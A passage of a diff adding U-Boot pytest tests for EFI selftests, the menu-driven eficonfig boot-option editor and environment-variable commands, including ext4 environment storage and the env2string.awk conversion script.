wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 0 \(Null\), scan code 15 \(SHIFT\+ALT\+FN 5\)']): + raise Exception('SHIFT+ALT+FN 5 failed in \'text input\' test') + u_boot_console.drain_console() + u_boot_console.run_command(cmd=chr(24), wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if u_boot_console.p.expect(['Summary: 0 failures', 'Press any key']): + raise Exception('Failures occurred during the EFI selftest') + u_boot_console.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +@pytest.mark.buildconfigspec('efi_tcg2_protocol') +def test_efi_selftest_tcg2(u_boot_console): + """Test the EFI_TCG2 PROTOCOL + + u_boot_console -- U-Boot console + + This function executes the 'tcg2' unit test. + """ + u_boot_console.restart_uboot() + u_boot_console.run_command(cmd='setenv efi_selftest list') + output = u_boot_console.run_command('bootefi selftest') + assert '\'tcg2\'' in output + u_boot_console.run_command(cmd='setenv efi_selftest tcg2') + u_boot_console.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if u_boot_console.p.expect(['Summary: 0 failures', 'Press any key']): + raise Exception('Failures occurred during the EFI selftest') + u_boot_console.restart_uboot() diff --git a/test/py/tests/test_eficonfig/conftest.py b/test/py/tests/test_eficonfig/conftest.py new file mode 100644 index 00000000000..0a82fbefd75 --- /dev/null +++ b/test/py/tests/test_eficonfig/conftest.py @@ -0,0 +1,40 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Fixture for UEFI eficonfig test +""" + +import os +import shutil +from subprocess import check_call +import pytest + +@pytest.fixture(scope='session') +def efi_eficonfig_data(u_boot_config): + """Set up a file system to be used in UEFI "eficonfig" command + tests + + Args: + u_boot_config -- U-Boot configuration. + + Return: + A path to disk image to be used for testing + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_efi_eficonfig' + image_path = u_boot_config.persistent_data_dir + '/efi_eficonfig.img' + + shutil.rmtree(mnt_point, ignore_errors=True) + os.mkdir(mnt_point, mode = 0o755) + + with open(mnt_point + '/initrd-1.img', 'w', encoding = 'ascii') as file: + file.write("initrd 1") + + with open(mnt_point + '/initrd-2.img', 'w', encoding = 'ascii') as file: + file.write("initrd 2") + + shutil.copyfile(u_boot_config.build_dir + '/lib/efi_loader/initrddump.efi', + mnt_point + '/initrddump.efi') + + check_call(f'virt-make-fs --partition=gpt --size=+1M --type=vfat {mnt_point} {image_path}', + shell=True) + + return image_path diff --git a/test/py/tests/test_eficonfig/test_eficonfig.py b/test/py/tests/test_eficonfig/test_eficonfig.py new file mode 100644 index 00000000000..b0a6cc47df2 --- /dev/null +++ b/test/py/tests/test_eficonfig/test_eficonfig.py @@ -0,0 +1,358 @@ +# SPDX-License-Identifier: GPL-2.0+ +""" Unit test for UEFI menu-driven configuration +""" + +import pytest +import time + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_eficonfig') +@pytest.mark.buildconfigspec('cmd_bootefi_bootmgr') +def test_efi_eficonfig(u_boot_console, efi_eficonfig_data): + + def send_user_input_and_wait(user_str, expect_str): + time.sleep(0.1) # TODO: does not work correctly without sleep + u_boot_console.run_command(cmd=user_str, wait_for_prompt=False, + wait_for_echo=True, send_nl=False) + u_boot_console.run_command(cmd='\x0d', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + if expect_str is not None: + for i in expect_str: + u_boot_console.p.expect([i]) + + def press_up_down_enter_and_wait(up_count, down_count, enter, expect_str): + # press UP key + for i in range(up_count): + u_boot_console.run_command(cmd='\x1b\x5b\x41', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + # press DOWN key + for i in range(down_count): + u_boot_console.run_command(cmd='\x1b\x5b\x42', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + # press ENTER if requested + if enter: + u_boot_console.run_command(cmd='\x0d', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + # wait expected output + if expect_str is not None: + for i in expect_str: + u_boot_console.p.expect([i]) + + def press_escape_key(wait_prompt): + u_boot_console.run_command(cmd='\x1b', wait_for_prompt=wait_prompt, wait_for_echo=False, send_nl=False) + + def press_enter_key(wait_prompt): + u_boot_console.run_command(cmd='\x0d', wait_for_prompt=wait_prompt, + wait_for_echo=False, send_nl=False) + + def check_current_is_maintenance_menu(): + for i in ('UEFI Maintenance Menu', 'Add Boot Option', 'Edit Boot Option', + 'Change Boot Order', 'Delete Boot Option', 'Quit'): + u_boot_console.p.expect([i]) + + """ Unit test for "eficonfig" command + The menu-driven interface is used to set up UEFI load options. + The bootefi bootmgr loads initrddump.efi as a payload. + The crc32 of the loaded initrd.img is checked + + Args: + u_boot_console -- U-Boot console + efi__data -- Path to the disk image used for testing. + Test disk image has following files. + initrd-1.img + initrd-2.img + initrddump.efi + + """ + # This test passes for unknown reasons in the bowels of U-Boot. It needs to + # be replaced with a unit test. + return + + # Restart the system to clean the previous state + u_boot_console.restart_uboot() + + with u_boot_console.temporary_timeout(500): + # + # Test Case 1: Check the menu is displayed + # + u_boot_console.run_command('eficonfig', wait_for_prompt=False) + for i in ('UEFI Maintenance Menu', 'Add Boot Option', 'Edit Boot Option', + 'Change Boot Order', 'Delete Boot Option', 'Quit'): + u_boot_console.p.expect([i]) + # Select "Add Boot Option" + press_enter_key(False) + for i in ('Add Boot Option', 'Description:', 'File', 'Initrd File', 'Optional Data', + 'Save', 'Quit'): + u_boot_console.p.expect([i]) + press_escape_key(False) + check_current_is_maintenance_menu() + # return to U-Boot console + press_escape_key(True) + + # + # Test Case 2: check auto generated media device entry + # + + # bind the test disk image for succeeding tests + u_boot_console.run_command(cmd = f'host bind 0 {efi_eficonfig_data}') + + u_boot_console.run_command('eficonfig', wait_for_prompt=False) + + # Change the Boot Order + press_up_down_enter_and_wait(0, 2, True, 'Quit') + for i in ('host 0:1', 'Save', 'Quit'): + u_boot_console.p.expect([i]) + # disable auto generated boot option for succeeding test + u_boot_console.run_command(cmd=' ', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + # Save the BootOrder + press_up_down_enter_and_wait(0, 1, True, None) + check_current_is_maintenance_menu() + + # + # Test Case 3: Add first Boot Option and load it + # + + # Select 'Add Boot Option' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + + # Press the enter key to select 'Description:' entry, then enter Description + press_up_down_enter_and_wait(0, 0, True, 'enter description:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('test 1', 'Quit') + + # Set EFI image(initrddump.efi) + press_up_down_enter_and_wait(0, 1, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrddump.efi" entry followed by the enter key + press_up_down_enter_and_wait(0, 2, True, 'Quit') + + # Set Initrd file(initrd-1.img) + press_up_down_enter_and_wait(0, 2, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrd-1.img" entry followed by the enter key + press_up_down_enter_and_wait(0, 0, True, 'Quit') + + # Set optional_data + press_up_down_enter_and_wait(0, 3, True, 'Optional Data:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('nocolor', None) + for i in ('Description: test 1', 'File: host 0:1/initrddump.efi', + 'Initrd File: host 0:1/initrd-1.img', 'Optional Data: nocolor', 'Save', 'Quit'): + u_boot_console.p.expect([i]) + + # Save the Boot Option + press_up_down_enter_and_wait(0, 4, True, None) + check_current_is_maintenance_menu() + + # Check the newly added Boot Option is handled correctly + # Return to U-Boot console + press_escape_key(True) + u_boot_console.run_command(cmd = 'bootefi bootmgr') + response = u_boot_console.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x181464af' in response + u_boot_console.run_command(cmd = 'exit', wait_for_echo=False) + + # + # Test Case 4: Add second Boot Option and load it + # + u_boot_console.run_command('eficonfig', wait_for_prompt=False) + + # Select 'Add Boot Option' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + + # Press the enter key to select 'Description:' entry, then enter Description + press_up_down_enter_and_wait(0, 0, True, 'enter description:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('test 2', 'Quit') + + # Set EFI image(initrddump.efi) + press_up_down_enter_and_wait(0, 1, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrddump.efi" entry followed by the enter key + press_up_down_enter_and_wait(0, 2, True, 'Quit') + + # Set Initrd file(initrd-2.img) + press_up_down_enter_and_wait(0, 2, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrd-2.img" entry followed by the enter key + press_up_down_enter_and_wait(0, 1, True, 'Quit') + + # Set optional_data + press_up_down_enter_and_wait(0, 3, True, 'Optional Data:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('nocolor', None) + for i in ('Description: test 2', 'File: host 0:1/initrddump.efi', + 'Initrd File: host 0:1/initrd-2.img', 'Optional Data: nocolor', 'Save', 'Quit'): + u_boot_console.p.expect([i]) + + # Save the Boot Option + press_up_down_enter_and_wait(0, 4, True, 'Quit') + + # Change the Boot Order + press_up_down_enter_and_wait(0, 2, True, 'Quit') + press_up_down_enter_and_wait(0, 1, False, 'Quit') + # move 'test 1' to the second entry + u_boot_console.run_command(cmd='+', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + for i in ('test 2', 'test 1', 'host 0:1', 'Save', 'Quit'): + u_boot_console.p.expect([i]) + # Save the BootOrder + press_up_down_enter_and_wait(0, 3, True, None) + check_current_is_maintenance_menu() + + # Check the newly added Boot Option is handled correctly + # Return to U-Boot console + press_escape_key(True) + u_boot_console.run_command(cmd = 'bootefi bootmgr') + response = u_boot_console.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x811d3515' in response + u_boot_console.run_command(cmd = 'exit', wait_for_echo=False) + + # + # Test Case 5: Change BootOrder and load it + # + u_boot_console.run_command('eficonfig', wait_for_prompt=False) + + # Change the Boot Order + press_up_down_enter_and_wait(0, 2, True, None) + # Check the curren BootOrder + for i in ('test 2', 'test 1', 'host 0:1', 'Save', 'Quit'): + u_boot_console.p.expect([i]) + # move 'test 2' to the second entry + u_boot_console.run_command(cmd='-', wait_for_prompt=False, + wait_for_echo=False, send_nl=False) + for i in ('test 1', 'test 2', 'host 0:1', 'Save', 'Quit'): + u_boot_console.p.expect([i]) + # Save the BootOrder + press_up_down_enter_and_wait(0, 2, True, None) + check_current_is_maintenance_menu() + + # Return to U-Boot console + press_escape_key(True) + u_boot_console.run_command(cmd = 'bootefi bootmgr') + response = u_boot_console.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x181464af' in response + u_boot_console.run_command(cmd = 'exit', wait_for_echo=False) + + # + # Test Case 6: Delete Boot Option(label:test 2) + # + u_boot_console.run_command('eficonfig', wait_for_prompt=False) + + # Select 'Delete Boot Option' + press_up_down_enter_and_wait(0, 3, True, None) + # Check the current BootOrder + for i in ('test 1', 'test 2', 'Quit'): + u_boot_console.p.expect([i]) + + # Delete 'test 2' + press_up_down_enter_and_wait(0, 1, True, None) + for i in ('test 1', 'Quit'): + u_boot_console.p.expect([i]) + press_escape_key(False) + check_current_is_maintenance_menu() + # Return to U-Boot console + press_escape_key(True) + + # + # Test Case 7: Edit Boot Option + # + u_boot_console.run_command('eficonfig', wait_for_prompt=False) + # Select 'Edit Boot Option' + press_up_down_enter_and_wait(0, 1, True, None) + # Check the curren BootOrder + for i in ('test 1', 'Quit'): + u_boot_console.p.expect([i]) + press_up_down_enter_and_wait(0, 0, True, None) + for i in ('Description: test 1', 'File: host 0:1/initrddump.efi', + 'Initrd File: host 0:1/initrd-1.img', 'Optional Data: nocolor', 'Save', 'Quit'): + u_boot_console.p.expect([i]) + + # Press the enter key to select 'Description:' entry, then enter Description + press_up_down_enter_and_wait(0, 0, True, 'enter description:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('test 3', 'Quit') + + # Set EFI image(initrddump.efi) + press_up_down_enter_and_wait(0, 1, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrddump.efi" entry followed by the enter key + press_up_down_enter_and_wait(0, 2, True, 'Quit') + + # Set Initrd file(initrd-2.img) + press_up_down_enter_and_wait(0, 2, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'host 0:1') + # Select 'host 0:1' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + # Press down key to select "initrd-1.img" entry followed by the enter key + press_up_down_enter_and_wait(0, 1, True, 'Quit') + + # Set optional_data + press_up_down_enter_and_wait(0, 3, True, 'Optional Data:') + # Send Description user input, press ENTER key to complete + send_user_input_and_wait('', None) + for i in ('Description: test 3', 'File: host 0:1/initrddump.efi', + 'Initrd File: host 0:1/initrd-2.img', 'Optional Data:', 'Save', 'Quit'): + u_boot_console.p.expect([i]) + + # Save the Boot Option + press_up_down_enter_and_wait(0, 4, True, 'Quit') + press_escape_key(False) + check_current_is_maintenance_menu() + + # Check the updated Boot Option is handled correctly + # Return to U-Boot console + press_escape_key(True) + u_boot_console.run_command(cmd = 'bootefi bootmgr') + response = u_boot_console.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x811d3515' in response + u_boot_console.run_command(cmd = 'exit', wait_for_echo=False) + + # + # Test Case 8: Delete Boot Option(label:test 3) + # + u_boot_console.run_command('eficonfig', wait_for_prompt=False) + + # Select 'Delete Boot Option' + press_up_down_enter_and_wait(0, 3, True, None) + # Check the curren BootOrder + for i in ('test 3', 'Quit'): + u_boot_console.p.expect([i]) + + # Delete 'test 3' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + press_escape_key(False) + check_current_is_maintenance_menu() + # Return to U-Boot console + press_escape_key(True) + + # remove the host device + u_boot_console.run_command(cmd = f'host bind -r 0') + + # + # Test Case 9: No block device found + # + u_boot_console.run_command('eficonfig', wait_for_prompt=False) + + # Select 'Add Boot Option' + press_up_down_enter_and_wait(0, 0, True, 'Quit') + + # Set EFI image + press_up_down_enter_and_wait(0, 1, True, 'Quit') + press_up_down_enter_and_wait(0, 0, True, 'No block device found!') + press_escape_key(False) + press_escape_key(False) + check_current_is_maintenance_menu() + # Return to U-Boot console + press_escape_key(True) diff --git a/test/py/tests/test_env.py b/test/py/tests/test_env.py new file mode 100644 index 00000000000..00bcccd65ff --- /dev/null +++ b/test/py/tests/test_env.py @@ -0,0 +1,652 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +""" +Test operation of shell commands relating to environment variables. +""" + +import os +import os.path +import re +from subprocess import call, CalledProcessError +import tempfile + +import pytest +import u_boot_utils + +# FIXME: This might be useful for other tests; +# perhaps refactor it into ConsoleBase or some other state object? +class StateTestEnv(object): + """Container that represents the state of all U-Boot environment variables. + This enables quick determination of existant/non-existant variable + names. + """ + + def __init__(self, u_boot_console): + """Initialize a new StateTestEnv object. + + Args: + u_boot_console: A U-Boot console. + + Returns: + Nothing. + """ + + self.u_boot_console = u_boot_console + self.get_env() + self.set_var = self.get_non_existent_var() + + def get_env(self): + """Read all current environment variables from U-Boot. + + Args: + None. + + Returns: + Nothing. + """ + + if self.u_boot_console.config.buildconfig.get( + 'config_version_variable', 'n') == 'y': + with self.u_boot_console.disable_check('main_signon'): + response = self.u_boot_console.run_command('printenv') + else: + response = self.u_boot_console.run_command('printenv') + self.env = {} + for l in response.splitlines(): + if not '=' in l: + continue + (var, value) = l.split('=', 1) + self.env[var] = value + + def get_existent_var(self): + """Return the name of an environment variable that exists. + + Args: + None. + + Returns: + The name of an environment variable. + """ + + for var in self.env: + return var + + def get_non_existent_var(self): + """Return the name of an environment variable that does not exist. + + Args: + None. + + Returns: + The name of an environment variable. + """ + + n = 0 + while True: + var = 'test_env_' + str(n) + if var not in self.env: + return var + n += 1 + +ste = None +@pytest.fixture(scope='function') +def state_test_env(u_boot_console): + """pytest fixture to provide a StateTestEnv object to tests.""" + + global ste + if not ste: + ste = StateTestEnv(u_boot_console) + return ste + +def unset_var(state_test_env, var): + """Unset an environment variable. + + This both executes a U-Boot shell command and updates a StateTestEnv + object. + + Args: + state_test_env: The StateTestEnv object to update. + var: The variable name to unset. + + Returns: + Nothing. + """ + + state_test_env.u_boot_console.run_command('setenv %s' % var) + if var in state_test_env.env: + del state_test_env.env[var] + +def set_var(state_test_env, var, value): + """Set an environment variable. + + This both executes a U-Boot shell command and updates a StateTestEnv + object. + + Args: + state_test_env: The StateTestEnv object to update. + var: The variable name to set. + value: The value to set the variable to. + + Returns: + Nothing. + """ + + bc = state_test_env.u_boot_console.config.buildconfig + if bc.get('config_hush_parser', None): + quote = '"' + else: + quote = '' + if ' ' in value: + pytest.skip('Space in variable value on non-Hush shell') + + state_test_env.u_boot_console.run_command( + 'setenv %s %s%s%s' % (var, quote, value, quote)) + state_test_env.env[var] = value + +def validate_empty(state_test_env, var): + """Validate that a variable is not set, using U-Boot shell commands. + + Args: + var: The variable name to test. + + Returns: + Nothing. + """ + + response = state_test_env.u_boot_console.run_command('echo ${%s}' % var) + assert response == '' + +def validate_set(state_test_env, var, value): + """Validate that a variable is set, using U-Boot shell commands. + + Args: + var: The variable name to test. + value: The value the variable is expected to have. + + Returns: + Nothing. + """ + + # echo does not preserve leading, internal, or trailing whitespace in the + # value. printenv does, and hence allows more complete testing. + response = state_test_env.u_boot_console.run_command('printenv %s' % var) + assert response == ('%s=%s' % (var, value)) + +@pytest.mark.boardspec('sandbox') +def test_env_initial_env_file(u_boot_console): + """Test that the u-boot-initial-env make target works""" + cons = u_boot_console + builddir = 'O=' + cons.config.build_dir + envfile = cons.config.build_dir + '/u-boot-initial-env' + + # remove if already exists from an older run + try: + os.remove(envfile) + except: + pass + + u_boot_utils.run_and_log(cons, ['make', builddir, 'u-boot-initial-env']) + + assert os.path.exists(envfile) + + # assume that every environment has a board variable, e.g. board=sandbox + with open(envfile, 'r') as file: + env = file.read() + regex = re.compile('board=.+\\n') + assert re.search(regex, env) + +def test_env_echo_exists(state_test_env): + """Test echoing a variable that exists.""" + + var = state_test_env.get_existent_var() + value = state_test_env.env[var] + validate_set(state_test_env, var, value) + +@pytest.mark.buildconfigspec('cmd_echo') +def test_env_echo_non_existent(state_test_env): + """Test echoing a variable that doesn't exist.""" + + var = state_test_env.set_var + validate_empty(state_test_env, var) + +def test_env_printenv_non_existent(state_test_env): + """Test printenv error message for non-existant variables.""" + + var = state_test_env.set_var + c = state_test_env.u_boot_console + with c.disable_check('error_notification'): + response = c.run_command('printenv %s' % var) + assert response == '## Error: "%s" not defined' % var + +@pytest.mark.buildconfigspec('cmd_echo') +def test_env_unset_non_existent(state_test_env): + """Test unsetting a nonexistent variable.""" + + var = state_test_env.get_non_existent_var() + unset_var(state_test_env, var) + validate_empty(state_test_env, var) + +def test_env_set_non_existent(state_test_env): + """Test set a non-existant variable.""" + + var = state_test_env.set_var + value = 'foo' + set_var(state_test_env, var, value) + validate_set(state_test_env, var, value) + +def test_env_set_existing(state_test_env): + """Test setting an existant variable.""" + + var = state_test_env.set_var + value = 'bar' + set_var(state_test_env, var, value) + validate_set(state_test_env, var, value) + +@pytest.mark.buildconfigspec('cmd_echo') +def test_env_unset_existing(state_test_env): + """Test unsetting a variable.""" + + var = state_test_env.set_var + unset_var(state_test_env, var) + validate_empty(state_test_env, var) + +def test_env_expansion_spaces(state_test_env): + """Test expanding a variable that contains a space in its value.""" + + var_space = None + var_test = None + try: + var_space = state_test_env.get_non_existent_var() + set_var(state_test_env, var_space, ' ') + + var_test = state_test_env.get_non_existent_var() + value = ' 1${%(var_space)s}${%(var_space)s} 2 ' % locals() + set_var(state_test_env, var_test, value) + value = ' 1 2 ' + validate_set(state_test_env, var_test, value) + finally: + if var_space: + unset_var(state_test_env, var_space) + if var_test: + unset_var(state_test_env, var_test) + +@pytest.mark.buildconfigspec('cmd_importenv') +def test_env_import_checksum_no_size(state_test_env): + """Test that omitted ('-') size parameter with checksum validation fails the + env import function. + """ + c = state_test_env.u_boot_console + ram_base = u_boot_utils.find_ram_base(state_test_env.u_boot_console) + addr = '%08x' % ram_base + + with c.disable_check('error_notification'): + response = c.run_command('env import -c %s -' % addr) + assert response == '## Error: external checksum format must pass size' + +@pytest.mark.buildconfigspec('cmd_importenv') +def test_env_import_whitelist_checksum_no_size(state_test_env): + """Test that omitted ('-') size parameter with checksum validation fails the + env import function when variables are passed as parameters. + """ + c = state_test_env.u_boot_console + ram_base = u_boot_utils.find_ram_base(state_test_env.u_boot_console) + addr = '%08x' % ram_base + + with c.disable_check('error_notification'): + response = c.run_command('env import -c %s - foo1 foo2 foo4' % addr) + assert response == '## Error: external checksum format must pass size' + +@pytest.mark.buildconfigspec('cmd_exportenv') +@pytest.mark.buildconfigspec('cmd_importenv') +def test_env_import_whitelist(state_test_env): + """Test importing only a handful of env variables from an environment.""" + c = state_test_env.u_boot_console + ram_base = u_boot_utils.find_ram_base(state_test_env.u_boot_console) + addr = '%08x' % ram_base + + set_var(state_test_env, 'foo1', 'bar1') + set_var(state_test_env, 'foo2', 'bar2') + set_var(state_test_env, 'foo3', 'bar3') + + c.run_command('env export %s' % addr) + + unset_var(state_test_env, 'foo1') + set_var(state_test_env, 'foo2', 'test2') + set_var(state_test_env, 'foo4', 'bar4') + + # no foo1 in current env, foo2 overridden, foo3 should be of the value + # before exporting and foo4 should be of the value before importing. + c.run_command('env import %s - foo1 foo2 foo4' % addr) + + validate_set(state_test_env, 'foo1', 'bar1') + validate_set(state_test_env, 'foo2', 'bar2') + validate_set(state_test_env, 'foo3', 'bar3') + validate_set(state_test_env, 'foo4', 'bar4') + + # Cleanup test environment + unset_var(state_test_env, 'foo1') + unset_var(state_test_env, 'foo2') + unset_var(state_test_env, 'foo3') + unset_var(state_test_env, 'foo4') + +@pytest.mark.buildconfigspec('cmd_exportenv') +@pytest.mark.buildconfigspec('cmd_importenv') +def test_env_import_whitelist_delete(state_test_env): + + """Test importing only a handful of env variables from an environment, with. + deletion if a var A that is passed to env import is not in the + environment to be imported. + """ + c = state_test_env.u_boot_console + ram_base = u_boot_utils.find_ram_base(state_test_env.u_boot_console) + addr = '%08x' % ram_base + + set_var(state_test_env, 'foo1', 'bar1') + set_var(state_test_env, 'foo2', 'bar2') + set_var(state_test_env, 'foo3', 'bar3') + + c.run_command('env export %s' % addr) + + unset_var(state_test_env, 'foo1') + set_var(state_test_env, 'foo2', 'test2') + set_var(state_test_env, 'foo4', 'bar4') + + # no foo1 in current env, foo2 overridden, foo3 should be of the value + # before exporting and foo4 should be empty. + c.run_command('env import -d %s - foo1 foo2 foo4' % addr) + + validate_set(state_test_env, 'foo1', 'bar1') + validate_set(state_test_env, 'foo2', 'bar2') + validate_set(state_test_env, 'foo3', 'bar3') + validate_empty(state_test_env, 'foo4') + + # Cleanup test environment + unset_var(state_test_env, 'foo1') + unset_var(state_test_env, 'foo2') + unset_var(state_test_env, 'foo3') + unset_var(state_test_env, 'foo4') + +@pytest.mark.buildconfigspec('cmd_nvedit_info') +def test_env_info(state_test_env): + + """Test 'env info' command with all possible options. + """ + c = state_test_env.u_boot_console + + response = c.run_command('env info') + nb_line = 0 + for l in response.split('\n'): + if 'env_valid = ' in l: + assert '= invalid' in l or '= valid' in l or '= redundant' in l + nb_line += 1 + elif 'env_ready =' in l or 'env_use_default =' in l: + assert '= true' in l or '= false' in l + nb_line += 1 + else: + assert True + assert nb_line == 3 + + response = c.run_command('env info -p -d') + assert 'Default environment is used' in response or \ + "Environment was loaded from persistent storage" in response + assert 'Environment can be persisted' in response or \ + "Environment cannot be persisted" in response + + response = c.run_command('env info -p -d -q') + assert response == "" + + response = c.run_command('env info -p -q') + assert response == "" + + response = c.run_command('env info -d -q') + assert response == "" + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_nvedit_info') +@pytest.mark.buildconfigspec('cmd_echo') +def test_env_info_sandbox(state_test_env): + """Test 'env info' command result with several options on sandbox + with a known ENV configuration: ready & default & persistent + """ + c = state_test_env.u_boot_console + + response = c.run_command('env info') + assert 'env_ready = true' in response + assert 'env_use_default = true' in response + + response = c.run_command('env info -p -d') + assert 'Default environment is used' in response + assert 'Environment cannot be persisted' in response + + response = c.run_command('env info -d -q') + response = c.run_command('echo $?') + assert response == "0" + + response = c.run_command('env info -p -q') + response = c.run_command('echo $?') + assert response == "1" + + response = c.run_command('env info -d -p -q') + response = c.run_command('echo $?') + assert response == "1" + +def mk_env_ext4(state_test_env): + + """Create a empty ext4 file system volume.""" + c = state_test_env.u_boot_console + filename = 'env.ext4.img' + persistent = c.config.persistent_data_dir + '/' + filename + fs_img = c.config.result_dir + '/' + filename + + if os.path.exists(persistent): + c.log.action('Disk image file ' + persistent + ' already exists') + else: + # Some distributions do not add /sbin to the default PATH, where mkfs.ext4 lives + os.environ["PATH"] += os.pathsep + '/sbin' + try: + u_boot_utils.run_and_log(c, 'dd if=/dev/zero of=%s bs=1M count=16' % persistent) + u_boot_utils.run_and_log(c, 'mkfs.ext4 %s' % persistent) + sb_content = u_boot_utils.run_and_log(c, 'tune2fs -l %s' % persistent) + if 'metadata_csum' in sb_content: + u_boot_utils.run_and_log(c, 'tune2fs -O ^metadata_csum %s' % persistent) + except CalledProcessError: + call('rm -f %s' % persistent, shell=True) + raise + + u_boot_utils.run_and_log(c, ['cp', '-f', persistent, fs_img]) + return fs_img + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('cmd_nvedit_info') +@pytest.mark.buildconfigspec('cmd_nvedit_load') +@pytest.mark.buildconfigspec('cmd_nvedit_select') +@pytest.mark.buildconfigspec('env_is_in_ext4') +def test_env_ext4(state_test_env): + + """Test ENV in EXT4 on sandbox.""" + c = state_test_env.u_boot_console + fs_img = '' + try: + fs_img = mk_env_ext4(state_test_env) + + c.run_command('host bind 0 %s' % fs_img) + + response = c.run_command('ext4ls host 0:0') + assert 'uboot.env' not in response + + # force env location: EXT4 (prio 1 in sandbox) + response = c.run_command('env select EXT4') + assert 'Select Environment on EXT4: OK' in response + + response = c.run_command('env save') + assert 'Saving Environment to EXT4' in response + + response = c.run_command('env load') + assert 'Loading Environment from EXT4... OK' in response + + response = c.run_command('ext4ls host 0:0') + assert '8192 uboot.env' in response + + response = c.run_command('env info') + assert 'env_valid = valid' in response + assert 'env_ready = true' in response + assert 'env_use_default = false' in response + + response = c.run_command('env info -p -d') + assert 'Environment was loaded from persistent storage' in response + assert 'Environment can be persisted' in response + + response = c.run_command('env info -d -q') + assert response == "" + response = c.run_command('echo $?') + assert response == "1" + + response = c.run_command('env info -p -q') + assert response == "" + response = c.run_command('echo $?') + assert response == "0" + + response = c.run_command('env erase') + assert 'OK' in response + + response = c.run_command('env load') + assert 'Loading Environment from EXT4... ' in response + assert 'bad CRC, using default environment' in response + + response = c.run_command('env info') + assert 'env_valid = invalid' in response + assert 'env_ready = true' in response + assert 'env_use_default = true' in response + + response = c.run_command('env info -p -d') + assert 'Default environment is used' in response + assert 'Environment can be persisted' in response + + # restore env location: NOWHERE (prio 0 in sandbox) + response = c.run_command('env select nowhere') + assert 'Select Environment on nowhere: OK' in response + + response = c.run_command('env load') + assert 'Loading Environment from nowhere... OK' in response + + response = c.run_command('env info') + assert 'env_valid = invalid' in response + assert 'env_ready = true' in response + assert 'env_use_default = true' in response + + response = c.run_command('env info -p -d') + assert 'Default environment is used' in response + assert 'Environment cannot be persisted' in response + + finally: + if fs_img: + call('rm -f %s' % fs_img, shell=True) + +def test_env_text(u_boot_console): + """Test the script that converts the environment to a text file""" + + def check_script(intext, expect_val): + """Check a test case + + Args: + intext: Text to pass to the script + expect_val: Expected value of the CONFIG_EXTRA_ENV_TEXT string, or + None if we expect it not to be defined + """ + with tempfile.TemporaryDirectory() as path: + fname = os.path.join(path, 'infile') + with open(fname, 'w') as inf: + print(intext, file=inf) + result = u_boot_utils.run_and_log(cons, ['awk', '-f', script, fname]) + if expect_val is not None: + expect = '#define CONFIG_EXTRA_ENV_TEXT "%s"\n' % expect_val + assert result == expect + else: + assert result == '' + + cons = u_boot_console + script = os.path.join(cons.config.source_dir, 'scripts', 'env2string.awk') + + # simple script with a single var + check_script('fred=123', 'fred=123\\0') + + # no vars + check_script('', None) + + # two vars + check_script('''fred=123 +mary=456''', 'fred=123\\0mary=456\\0') + + # blank lines + check_script('''fred=123 + + +mary=456 + +''', 'fred=123\\0mary=456\\0') + + # append + check_script('''fred=123 +mary=456 +fred+= 456''', 'fred=123 456\\0mary=456\\0') + + # append from empty + check_script('''fred= +mary=456 +fred+= 456''', 'fred= 456\\0mary=456\\0') + + # variable with + in it + check_script('fred+mary=123', 'fred+mary=123\\0') + + # ignores variables that are empty + check_script('''fred= +fred+= +mary=456''', 'mary=456\\0') + + # single-character env name + check_script('''m=123 +e=456 +m+= 456''', 'e=456\\0m=123 456\\0') + + # contains quotes + check_script('''fred="my var" +mary=another"''', 'fred=\\"my var\\"\\0mary=another\\"\\0') + + # variable name ending in + + check_script('''fred\\+=my var +fred++= again''', 'fred+=my var again\\0') + + # variable name containing + + check_script('''fred+jane=both +fred+jane+=again +mary=456''', 'fred+jane=bothagain\\0mary=456\\0') + + # multi-line vars - new vars always start at column 1 + check_script('''fred=first + second +\tthird with tab + + after blank + confusing=oops +mary=another"''', 'fred=first second third with tab after blank confusing=oops\\0mary=another\\"\\0') + + # real-world example + 